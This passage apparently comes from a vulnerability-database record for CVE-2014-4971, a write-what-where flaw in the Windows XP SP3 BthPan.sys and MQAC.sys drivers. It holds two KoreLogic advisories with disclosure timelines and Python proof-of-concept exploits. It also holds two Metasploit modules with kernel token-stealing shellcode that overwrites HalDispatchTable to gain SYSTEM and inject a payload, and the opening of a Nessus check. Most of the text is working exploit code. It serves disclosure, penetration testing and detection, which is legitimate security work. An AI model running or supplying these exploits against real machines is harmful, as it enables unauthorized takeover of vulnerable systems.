Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have not\n been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days have\n passed since vendor acknowledgement of the initial\n report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft informs KoreLogic that the vulnerability\n does not impact any \"up-platform\" products. Says they\n are investigating embedded platforms. Does not provide\n CVE number.\n 2014.06.24 - Microsoft contacts KoreLogic to say that they confused\n the report of this vulnerability with another and that\n they cannot reproduce the described behavior.\n Microsoft asks for an updated Proof-of-Concept, crash\n dumps or any further analysis of the vulnerability\n that KoreLogic can provide.\n 2014.06.25 - KoreLogic provides Microsoft with an updated\n Proof-of-Concept which demonstrates using the\n vulnerability to spawn a system shell.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. 
Also requests that a CVE\n ID be issued for this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be\n identical to KL-001-2014-003 and issues CVE-2014-4971\n for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. Proof of Concept\n\"\"\"\n\n#!/usr/bin/python2\n#\n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971\n#\nfrom ctypes import *\nfrom struct import pack\nfrom os import getpid,system\nfrom sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n \n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them \n def getBase(name=None):\n \tretArray = c_ulong*1024\n \tImageBase = retArray()\n \tcallback = c_int(1024)\n \tcbNeeded = c_long()\n \tEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n \tfor base in ImageBase:\n \t\tdriverName = c_char_p(\"\\x00\"*1024)\n \t\tGetDeviceDriverBaseNameA(base,driverName,48)\n \t\tif (name):\n \t\t\tif (driverName.value.lower() == name):\n \t\t\t\treturn base\n \t\telse:\n \t\t\treturn (base,driverName.value)\n \treturn None\n \n handle = 
CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n if (handle == INVALID_HANDLE_VALUE):\n\tprint \"[!] Could not open handle to BthPan\"\n\texit(1)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n kBase,kVer = getBase()\n hKernel = LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)\n\n\"\"\"\nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc.\nand are licensed under a Creative Commons Attribution Share-Alike 4.0\n(United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a proven\ntrack record of providing security services to entities ranging from\nFortune 500 to small and mid-sized companies. We are a highly skilled\nteam of senior security consultants doing by-hand security assessments\nfor the most important networks in the U.S. and around the world. 
We\nare also developers of various tools and resources aimed at helping\nthe security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt\n\"\"\"", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation", "edition": 1, "published": "2014-07-19T00:00:00", "title": "Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-19T00:00:00", "id": "EXPLOITPACK:2A8B8964BB26CD0903DEAAD854198D2F", "href": "", "sourceData": "Title: Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-003\nPublication Date: 2014.07.18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: MQ Access Control\n Affected Versions: 5.1.0.1110\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the MQAC module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the MQAC device and\n subsequently make DeviceIoControlFile() calls into that device.\n During the IRP handler routine for 0x1965020f the user provided\n OutputBuffer address is not validated. 
This allows an attacker\n to specify an arbitrary address and write (or overwrite) the\n memory residing at the specified address. This is classically\n known as a write-what-where vulnerability and has well-known\n exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our\n fuzzing testcase, the specified OutputBuffer in the\n DeviceIoControlFile() call is 0xffff0000.\n\nSTACK_TEXT: \nb1c4594c 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1c459ac 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1c459ac b230af37 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1c45a68 b230c0a1 ffff0000 000000d3 0000000c mqac!AC2QM+0x5d\nb1c45ab4 804ee129 81ebb558 82377e48 806d32d0 mqac!ACDeviceControl+0x16d\nb1c45ac4 80574e56 82377eb8 82240510 82377e48 nt!IopfCallDriver+0x31\nb1c45ad8 80575d11 81ebb558 82377e48 82240510 nt!IopSynchronousServiceTail+0x70\nb1c45b80 8056e57c 000006a4 00000000 00000000 nt!IopXxxControlFile+0x5e7\nb1c45bb4 b1aea17e 000006a4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\n\n Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'\n command shows the fault originating in the mqac driver.\n\nFOLLOWUP_IP: \nmqac!AC2QM+5d\nb230af37 891e mov dword ptr [esi],ebx\n\n Reviewing the TRAP_FRAME at the time of crash we can see\n IopCompleteRequest() copying data from InputBuffer into the\n OutputBuffer. InputBuffer is another parameter provided to the\n DeviceIoControlFile() function and is therefore controllable by\n the attacker. 
The edi register contains the invalid address\n provided during the fuzz testcase.\n\nTRAP_FRAME: b1c459c4 -- (.trap 0xffffffffb1c459c4)\nErrCode = 00000002\neax=b1c45a58 ebx=00000000 ecx=ffff0000 edx=82377e48 esi=ffff0000 edi=00000000\neip=b230af37 esp=b1c45a38 ebp=b1c45a68 iopl=0 nv up ei pl zr na pe nc\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\nmqac!AC2QM+0x5d:\nb230af37 891e mov dword ptr [esi],ebx ds:0023:ffff0000=????????\n\n A write-what-where vulnerability can be leveraged to obtain\n escalated privileges. To do so, an attacker will need to\n allocate memory in userland that is populated with shellcode\n designed to find the Token for PID 4 (System) and then overwrite\n the token for its own process. By leveraging the vulnerability\n in MQAC it is then possible to overwrite the pointer at\n HalDispatchTable+0x4 with a pointer to our shellcode. Calling\n NtQueryIntervalProfile() will subsequently call\n HalDispatchTable+0x4, execute our shellcode, and elevate the\n privilege of the exploit process.\n\n4. Mitigation and Remediation Recommendation\n\n None. A patch is not likely to be forthcoming from the vendor.\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin of KoreLogic\n Security, Inc.\n\n6. 
Disclosure Timeline\n\n 2014.04.28 - Initial contact; sent Microsoft report and PoC.\n 2014.04.28 - Microsoft acknowledges receipt of vulnerability\n report; states XP is no longer supported and asks if\n the vulnerability affects other versions of Windows.\n 2014.04.29 - KoreLogic asks Microsoft for clarification of their\n support policy for XP.\n 2014.04.29 - Microsoft says XP-only vulnerabilities will not be\n addressed with patches.\n 2014.04.29 - KoreLogic asks if Microsoft intends to address the\n vulnerability report.\n 2014.04.29 - Microsoft opens case to investigate the impact of the\n vulnerability on non-XP systems.\n 2014.05.06 - Microsoft asks again if this vulnerability affects\n non-XP systems.\n 2014.05.14 - KoreLogic informs Microsoft that the vulnerability\n report is for XP and other Windows versions have\n not been examined.\n 2014.06.11 - KoreLogic informs Microsoft that 30 business days\n have passed since vendor acknowledgement of the\n initial report. KoreLogic requests CVE number for the\n vulnerability, if there is one. KoreLogic also\n requests vendor's public identifier for the\n vulnerability along with the expected disclosure date.\n 2014.06.11 - Microsoft responds to KoreLogic that the\n vulnerability does not affect an \"up-platform\"\n product. Says they are investigating embedded\n platforms. Does not provide a CVE number or a\n disclosure date.\n 2014.06.30 - KoreLogic asks Microsoft for confirmation of their\n receipt of the updated PoC. Also requests that\n a CVE ID be issued to this vulnerability.\n 2014.07.02 - 45 business days have elapsed since Microsoft\n acknowledged receipt of the vulnerability report and\n PoC.\n 2014.07.07 - KoreLogic requests CVE from MITRE.\n 2014.07.18 - MITRE deems this vulnerability (KL-001-2014-003) to\n be identical to KL-001-2014-002 and issues\n CVE-2014-4971 for both vulnerabilities.\n 2014.07.18 - Public disclosure.\n\n7. 
Proof of Concept\n\n #!/usr/bin/python2\n #\n # KL-001-2014-003 : Microsoft XP SP3 MQAC.sys Arbitrary Write Privilege Escalation\n # Matt Bergin (KoreLogic / Smash the Stack)\n # CVE-2014-4971\n #\n from ctypes import *\n from struct import pack\n from os import getpid,system\n from sys import exit\n EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA\n GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle\n INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0\n\n # thanks to offsec for the concept\n # I re-wrote the code as to not fully insult them :)\n def getBase(name=None):\n retArray = c_ulong*1024\n ImageBase = retArray()\n callback = c_int(1024)\n cbNeeded = c_long()\n EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))\n for base in ImageBase:\n driverName = c_char_p(\"\\x00\"*1024)\n GetDeviceDriverBaseNameA(base,driverName,48)\n if (name):\n if (driverName.value.lower() == name):\n return base\n else:\n return (base,driverName.value)\n return None\n\n handle = CreateFileA(\"\\\\\\\\.\\\\MQAC\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)\n print \"[+] Handle \\\\\\\\.\\\\MQAC @ %s\" % (handle)\n NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)\n buf = \"\\x50\\x00\\x00\\x00\"+\"\\x90\"*0x400\n WriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0)))\n WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))\n WriteProcessMemory(-1, 0x5000, \"\\xcc\", 77, byref(c_int(0)))\n #Overwrite Pointer\n kBase,kVer = getBase()\n hKernel = 
LoadLibraryExA(kVer,0,1)\n HalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\")\n HalDispatchTable -= hKernel\n HalDispatchTable += kBase\n HalDispatchTable += 0x4\n print \"[+] Kernel @ %s, HalDispatchTable @ %s\" % (hex(kBase),hex(HalDispatchTable))\n DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x1965020f,0x1,0x258,HalDispatchTable,0)\n print \"[+] HalDispatchTable+0x4 overwritten\"\n CloseHandle(handle)\n NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))\n exit(0)\n\nThe contents of this advisory are copyright(c) 2014\nKoreLogic, Inc. and are licensed under a Creative Commons\nAttribution Share-Alike 4.0 (United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a\nproven track record of providing security services to entities\nranging from Fortune 500 to small and mid-sized companies. We\nare a highly skilled team of senior security consultants doing\nby-hand security assessments for the most important networks in\nthe U.S. and around the world. We are also developers of various\ntools and resources aimed at helping the security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-07T23:47:01", "description": "A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. 
This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process.\n", "published": "2014-07-22T14:04:12", "type": "metasploit", "title": "MQAC.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MQAC_WRITE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',\n 'Description' => %q(\n A vulnerability within the MQAC.sys module allows an attacker to\n overwrite an arbitrary location in kernel memory.\n\n This module will elevate itself to SYSTEM, then inject the payload\n into another SYSTEM process.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Matt Bergin', # original exploit and all the hard work\n 'Spencer McIntyre' # MSF module\n ],\n 'Arch' => [ARCH_X86],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' =>\n [\n ['Windows XP SP3',\n {\n 'HaliQuerySystemInfo' => 0x16bba,\n '_KPROCESS' => \"\\x44\",\n '_TOKEN' => \"\\xc8\",\n '_UPID' => \"\\x84\",\n '_APLINKS' => \"\\x88\"\n }\n ]\n ],\n 'References' =>\n [\n ['CVE', '2014-4971'],\n ['EDB', '34112'],\n ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']\n ],\n 'DisclosureDate' => '2014-07-22',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n }\n ))\n end\n\n # Function borrowed from smart_hashdump\n def get_system_proc\n # Make sure you got the correct 
SYSTEM Account Name no matter the OS Language\n local_sys = resolve_sid('S-1-5-18')\n system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"\n\n this_pid = session.sys.process.getpid\n # Processes that can Blue Screen a host if migrated in to\n dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']\n session.sys.process.processes.each do |p|\n # Check we are not migrating to a process that can BSOD the host\n next if dangerous_processes.include?(p['name'])\n next if p['pid'] == this_pid\n next if p['pid'] == 4\n next if p['user'] != system_account_name\n return p\n end\n end\n\n def check\n handle = open_device('\\\\\\\\.\\\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n if handle.nil?\n print_error('MSMQ installation not found')\n return Exploit::CheckCode::Safe\n end\n session.railgun.kernel32.CloseHandle(handle)\n\n os = sysinfo['OS']\n case os\n when /windows xp.*service pack 3/i\n return Exploit::CheckCode::Appears\n when /windows xp/i\n vprint_error('Unsupported version of Windows XP detected')\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n if sysinfo['Architecture'] == ARCH_X64\n fail_with(Failure::NoTarget, 'Running against 64-bit systems is not supported')\n end\n\n if is_system?\n print_error('This meterpreter session is already running as SYSTEM')\n return\n end\n\n # Running on Windows XP versions that aren't listed in the supported list\n # results in a BSOD and so we should not let that happen.\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system\")\n end\n\n base_addr = 0xffff\n handle = open_device('\\\\\\\\.\\\\MQAC', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return if handle.nil?\n\n this_proc = session.sys.process.open\n unless this_proc.memory.writable?(base_addr)\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,\n [0xffff].pack('V'),\n 
'MEM_COMMIT|MEM_RESERVE',\n 'PAGE_EXECUTE_READWRITE')\n end\n unless this_proc.memory.writable?(base_addr)\n print_error('Failed to properly allocate memory')\n this_proc.close\n return\n end\n\n haldispatchtable = find_haldispatchtable\n return if haldispatchtable.nil?\n print_status(\"HalDisPatchTable Address: 0x#{haldispatchtable.to_s(16)}\")\n\n vprint_status('Getting the hal.dll base address...')\n hal_info = find_sys_base('hal.dll')\n fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?\n hal_base = hal_info[0]\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}\")\n hali_query_system_information = hal_base + target['HaliQuerySystemInfo']\n\n restore_ptrs = \"\\x31\\xc0\" # xor eax, eax\n restore_ptrs << \"\\xb8\" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation\n restore_ptrs << \"\\xa3\" + [haldispatchtable + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax\n\n shellcode = make_nops(0x200) + restore_ptrs + token_stealing_shellcode(target)\n\n this_proc.memory.write(0x1, shellcode)\n this_proc.close\n\n print_status('Triggering vulnerable IOCTL')\n session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,\n 1, 0x258,\n haldispatchtable + 4, 0)\n session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)\n\n unless is_system?\n print_error('Did not get system, exploit failed')\n return\n end\n\n proc = get_system_proc\n print_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\")\n unless execute_shellcode(payload.encoded, nil, proc['pid'])\n fail_with(Failure::Unknown, 'Error while executing the payload')\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/mqac_write.rb"}, {"lastseen": "2020-10-07T23:48:48", "description": "A vulnerability within Microsoft Bluetooth 
Personal Area Networking module, BthPan.sys, can allow an attacker to inject memory controlled by the attacker into an arbitrary location. This can be used by an attacker to overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling NtQueryIntervalProfile.\n", "published": "2014-07-22T22:17:06", "type": "metasploit", "title": "MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/BTHPAN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/local/windows_kernel'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Exploit::Local::WindowsKernel\n include Msf::Post::File\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS14-062 Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',\n 'Description' => %q{\n A vulnerability within Microsoft Bluetooth Personal Area Networking module,\n BthPan.sys, can allow an attacker to inject memory controlled by the attacker\n into an arbitrary location. 
This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently calling\n NtQueryIntervalProfile.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC\n 'Jay Smith <jsmith[at]korelogic.com>' # MSF module\n ],\n 'Arch' => ARCH_X86,\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' =>\n [\n ['Windows XP SP3',\n {\n 'HaliQuerySystemInfo' => 0x16bba,\n '_KPROCESS' => \"\\x44\",\n '_TOKEN' => \"\\xc8\",\n '_UPID' => \"\\x84\",\n '_APLINKS' => \"\\x88\"\n }\n ]\n ],\n 'References' =>\n [\n [ 'MSB', 'MS14-062' ],\n [ 'CVE', '2014-4971' ],\n [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],\n [ 'OSVDB', '109387' ]\n ],\n 'DisclosureDate' => '2014-07-18',\n 'DefaultTarget' => 0\n ))\n end\n\n\n def ring0_shellcode\n tokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\"\n tokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\"\n tokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\"\n tokenswap << \"\\x00\\x00\\x00\\x2D\\x88\"\n tokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\"\n tokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\"\n tokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\"\n tokenswap << [session.sys.process.getpid].pack('V')\n tokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\"\n tokenswap << \"\\x2D\\x88\\x00\\x00\\x00\"\n tokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\"\n tokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\"\n tokenswap << \"\\x00\\x00\\x00\\x61\\xC3\"\n end\n\n def fill_memory(proc, address, length, content)\n session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\")\n\n unless proc.memory.writable?(address)\n vprint_error(\"Failed to allocate memory\")\n return nil\n end\n vprint_good(\"#{address} is now writable\")\n\n result = 
proc.memory.write(address, content)\n\n if result.nil?\n vprint_error(\"Failed to write contents to memory\")\n return nil\n end\n vprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\")\n\n return address\n end\n\n def disclose_addresses(t)\n addresses = {}\n\n hal_dispatch_table = find_haldispatchtable\n return nil if hal_dispatch_table.nil?\n addresses['halDispatchTable'] = hal_dispatch_table\n vprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\")\n\n vprint_status('Getting the hal.dll base address...')\n hal_info = find_sys_base('hal.dll')\n if hal_info.nil?\n vprint_error('Failed to disclose hal.dll base address')\n return nil\n end\n hal_base = hal_info[0]\n vprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\")\n\n hali_query_system_information = hal_base + t['HaliQuerySystemInfo']\n addresses['HaliQuerySystemInfo'] = hali_query_system_information\n\n vprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\")\n addresses\n end\n\n def check\n # covers both native x64 and WOW64\n if sysinfo[\"Architecture\"] == ARCH_X64\n return Exploit::CheckCode::Safe\n end\n\n os = sysinfo[\"OS\"]\n return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i\n\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n return Exploit::CheckCode::Safe unless handle\n\n session.railgun.kernel32.CloseHandle(handle)\n\n return Exploit::CheckCode::Detected\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system\")\n end\n\n handle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')\n if handle.nil?\n fail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\")\n end\n\n my_target = 
targets[0]\n print_status(\"Disclosing the HalDispatchTable address...\")\n @addresses = disclose_addresses(my_target)\n if @addresses.nil?\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\")\n else\n print_good(\"Address successfully disclosed.\")\n end\n\n print_status(\"Storing the shellcode in memory...\")\n this_proc = session.sys.process.open\n kernel_shell = ring0_shellcode\n kernel_shell_address = 0x1\n\n buf = \"\\x90\" * 0x6000\n buf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400\n buf[0x5000, kernel_shell.length] = kernel_shell\n\n result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)\n if result.nil?\n session.railgun.kernel32.CloseHandle(handle)\n fail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\")\n end\n print_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\")\n\n print_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\")\n session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0)\n session.railgun.kernel32.CloseHandle(handle)\n\n print_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\")\n session.railgun.ntdll.NtQueryIntervalProfile(2, 4)\n\n print_status(\"Checking privileges after exploitation...\")\n\n unless is_system?\n fail_with(Failure::Unknown, \"The privilege escalation wasn't successful\")\n end\n print_good(\"Privilege escalation successful!\")\n\n p = payload.encoded\n print_status(\"Injecting #{p.length} bytes to memory and executing it...\")\n unless execute_shellcode(p)\n fail_with(Failure::Unknown, \"Error while executing the payload\")\n end\n end\nend\n\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/bthpan.rb"}], "nessus": [{"lastseen": "2021-04-01T06:16:02", "description": "The remote Windows host is affected by a privilege escalation\nvulnerability in the Microsoft Message Queuing (MSMQ) service. The\nvulnerability can be exploited if an attacker sends a specially\ncrafted input/output control (IOCTL) request to the Message Queuing\nservice. Successful exploitation of this vulnerability could lead to\nfull access to the affected system.", "edition": 29, "published": "2014-10-15T00:00:00", "title": "MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4971"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS14-062.NASL", "href": "https://www.tenable.com/plugins/nessus/78438", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78438);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2014-4971\");\n 